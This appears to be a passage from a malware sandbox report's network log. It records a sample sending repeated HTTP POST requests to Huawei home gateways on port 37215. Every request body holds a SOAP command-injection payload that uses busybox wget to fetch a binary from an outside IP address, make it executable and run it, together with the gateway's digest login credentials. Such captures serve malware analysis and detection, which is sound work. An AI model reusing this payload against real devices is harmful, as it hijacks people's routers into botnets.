                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746061087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.681785107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:20.617577076 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:36.233099937 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:18:08.999527931 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      91192.168.2.1448740156.186.175.19937215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:04.987848043 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.318118095 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.802079916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:06.794202089 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:08.746061087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:12.681785107 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
